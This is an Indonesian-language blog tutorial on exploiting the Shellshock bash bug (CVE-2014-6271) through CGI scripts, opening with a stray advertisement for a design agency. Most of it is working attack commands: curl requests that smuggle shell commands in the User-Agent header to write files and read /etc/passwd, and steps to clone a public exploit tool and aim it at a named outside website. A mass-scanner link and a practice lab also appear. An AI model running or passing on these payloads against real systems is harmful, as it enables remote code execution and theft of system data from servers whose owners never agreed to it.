Mengenal Shellshock [Out of Date Bug] - Mr.Robot Eps.2

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.

Shellshock adalah kerentanan yang ditemukan pada sistem operasi linux pada tahun 2014 (CVE-2014-6271). Shellshock sendiri memanfaatkan kerentanan dalam shell bash code execution yang berpotensi memungkinkan peretas mengambil kendali mesin dan melakukan RCE (Remote Code Execution)  langsung ke sistem.

Di tahun 2020 sendiri bug shellshock sudah dianggap Out Of Date dan jarang sekali ditemukan, namun tidak ada salahnya untuk mempelajari teknik 1 ini. Bug Ini biasa ditemukan pada website yang mempunyai path /cgi-bin/ .Kita akan belajar 2 cara melakukan exploitasi bug ini. yang pertama manual menggunakan curl, dan yang ke 2 menggunakan tools.

Exploitasi Shellshock Manual


Source: Vendetablog
curl -k http://localhost/cgi-bin/test-cgi -H "User-Agent: () { :; }; echo Hacked  > /tmp/Hacked"

Untuk Melihat File bisa menggunakan command
curl -k http://localhost/cgi-bin/test-cgi -H "User-Agent: () { :; }; cat /tmp/Hacked"

Source Linuxsec
curl -A “() { :; }; echo; /bin/cat /etc/passwd” http://localhost/cgi-bin/test-cgi > hacked.txt

Untuk Melihat File bisa menggunakan command
curl -A “() { :; }; echo; /bin/cat /cgi-bin/test-cgi/hacked.txt” http://localhost/cgi-bin/test-cgi
Exploitasi Shellshock With Tools

git clone https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck

cd Xpl-SHELLSHOCK-Ch3ck

php xpl.php -t 'http://www.nakanosec.com/cgi-bin/login.sh' -c pwd


Tool  Mass Scanner
https://pastebin.com/djVUzdiT

Shellshock Labs
https://github.com/opsxcq/exploit-CVE-2014-6271
Preview 





Artikel Terbaru